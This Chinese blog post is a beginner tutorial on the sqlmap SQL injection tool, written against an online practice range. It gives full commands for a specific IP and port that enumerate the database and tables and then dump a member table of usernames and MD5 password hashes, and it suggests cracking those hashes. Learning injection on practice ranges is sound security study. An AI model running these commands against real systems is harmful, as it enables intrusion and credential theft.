SQL map的基本用法

最新推荐文章于 2024-07-29 17:03:55 发布
最新推荐文章于 2024-07-29 17:03:55 发布
阅读量1.6w 收藏 33
点赞数 4
分类专栏: 作业
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44720671/article/details/89080240
版权

SQL map的基本用法(初步入门)

sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由python语言开发而成,因此运行需要安装python环境。

首先,我们需要检测注入点是否可用
我以墨者学院的靶场为例:
在这里插入图片描述
这里的公告就是一个合适的注入点
(检测注入点需要利用其他工具)
在这里插入图片描述
在这里插入图片描述
我们可以利用手工注入的方式,但有些费时,因此我们可以使用SQL map等工具来辅助操作。
打开SQL map
在这里插入图片描述
输入python sqlmap.py -u “http://219.153.49.228:46548/new_list.php?id=1” --current-db
这里引号内是需要注入的网址,“–current-db”则是获取数据库名
在这里插入图片描述
然后再列出数据库的表
输入:python sqlmap.py -u “http://219.153.49.228:46548/new_list.php?id=1” -D mozhe_discuz_stormgroup --tables
D是表示数据库,tables是求表名
在这里插入图片描述
我们可以看到这里仅有两个表,因此我们无需再细化,可以直接将表中数据输出:
输入:python SQLMAP.py -u “http://219.153.49.228:46548/new_list.php?id=1” -D mozhe_discuz_stormgroup -T stormgroup_member --dump
在这里插入图片描述
表中的“name”下的是用户名,“password”下是密码,但是这个密码是通过md5加密的,我们需要使用md5解密工具进行解密。
在这里插入图片描述
这样,我们就很轻松的获取了用户名和密码。尽管工具确实很好用,但也不能完全依赖工具,手动注入的方法也应熟练掌握!

以菜之名
关注
  • 4
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
sqlmap详细教程
简介
01-04 3223
SQLmqp教程!
<map>的基本用法
weixin_43621608的博客
01-05 2841
用于存储和检索集合中的数据,此集合中的每个元素均为包含数据值和排序键的元素对。 键的值是唯一的,用于自动排序数据。 map是stl的一种关联容器,它提供一对一的数据处理能力。 map内部的实现,自建一颗红黑树,具有对数据自动排序的功能。 可以直接更改映射中的元素值。 键值是常量,不能更改。 必须先删除与旧元素关联的键值,才能为新元素插入新键值。 C++ 标准库 map 类为: 大小可变的关联容器,...
Sqlmap中文手册
热门推荐
若水斋
12-22 12万+
这是我自己翻译的Sqlmap1.1.10的中文手册。Sqlmap是十分著名的、自动化的SQL注入工具。为了较为系统地学习Sqlmap,我决定翻译一遍Sqlmap的用户手册,于是便有了此文。由于我英语学得很差,所以翻译地不好。基本上是意译,还加入了我自己的东西,和原文有较大差距。
SQL数组常用函数记录(Map篇)
最新发布
weixin_40809627的博客
07-29 724
MAP又被称为字典,格式如{key1:value1,key2:value2,…}形式,一般以k:v成对出现。1、map构造输出实例2、获取map 获取map字段的所有key值,或者所有value值map_keys(map字段) -- 返回map字段里所有的key值,输出为数组--> 输出示例:["14","28","180","365","7","90","60","30"]map_values(map字段) -- 返回map字段里左右的value值,输出为数组。
sql map
airujingye的专栏
12-11 672
sql map
sqlmap的使用方法(含靶场)
0nc3的博客
11-06 7725
0x00 sqlmap简介 Sqlmap的7种等级: 常用–leve 3 0x01 mysql数据库的注入 靶场地址:http://59.63.200.79:8003 查看数据库名 sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs 查看表 sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe...
SQLMap
m0_74326063的博客
08-04 69
配置完以后重启系统,查看是否生效,“win+R”,输入cmd,然后输入python,显示版本信息配置成功。把python27(就是刚才安装默认生成的文件夹)的路径加进去,点击确定后离开。直接将下载的SQLMap安装包解压到“C:/Python27”目录下。下载地址:http://sqlmap.org/点击环境变量——选择系统变量path——新建。按“win+R"键,输入sysdm.cpl。SQLMap 进阶:参数讲解。SQL Map 详解。显示正常,设置完成。
sqlmap基本使用
Alonegrief的博客
12-03 173
查看注入点:-u 检测注入点 Sqlmap.py -u url 查看数据库:-dbs 查看所有库 Sqlmap.py url -dbs 爆数据库表名:-D 指定数据库名 –tables 列数据库表 Sqlmap.py url –D (数据库名) –tables 爆数据表的列名:–cloumns 列出字段 Sqlmap –u url –D (数据库名) –T(列名) –columns 爆出数据: -dump:配合-D –T –C :列出指定数据库的表的字段的数据 Sqlmap.py url –D (数据库
sql map用户手册.docx
10-09
sqlmap 的使用方法包括: 1. 获取目标 URL 参数:-u 或者 --url 2. 从 Burp 或者 WebScarab 代理中获取日志参数:-l 3. 从文本中获取多个目标扫描参数:-m 4. 从文件中加载 HTTP 请求参数:-r 5. 处理 Google 的...
spark sql map():_*函数
u010569893的博客
02-07 829
spark sql map()._* 循环对字段进行处理
详解Java的MyBatis框架中动态SQL基本用法
09-02
MyBatis是一个优秀的Java持久层框架,它支持定制化SQL、存储过程以及高级映射。在处理复杂的数据库操作时,动态SQL是MyBatis的一大亮点。...通过熟练掌握这些标签的用法,可以更好地利用MyBatis进行数据库操作。
基于iBatis SQL Map的数据持久层实现应用研究.pdf
09-19
综上所述,iBatis SQL Map通过其独特的配置方式和API设计,为Java开发者提供了一种高效、灵活的数据持久层实现方法。这不仅体现在其能够将对象模型映射到关系模型的能力上,还包括其在实际应用中的表现,如方便性、...
SQL MAP配置*
11-15 1960
转自: http://www.cnblogs.com/dwjaissk/archive/2006/03/07/344999.html   例如:file:///c:/config/my.properties" /> (二)   例如:file:///c:/config/my.properties" /> (二) 元素 元素用于配置和优化利用XML配置文件创建的SqlMapClien
使用Map集合作为封装SQL查询结果的场景和注意事项
m0_68201836的博客
12-17 2289
使用Map集合作为封装SQL查询结果的场景和注意事项
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
dzqxwzoe的博客
09-05 2万+
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
sqlmap介绍及简单实用
我不是大牛
06-25 1万+
Sqlmap的使用 一、Sqlmap简介 sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access,...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值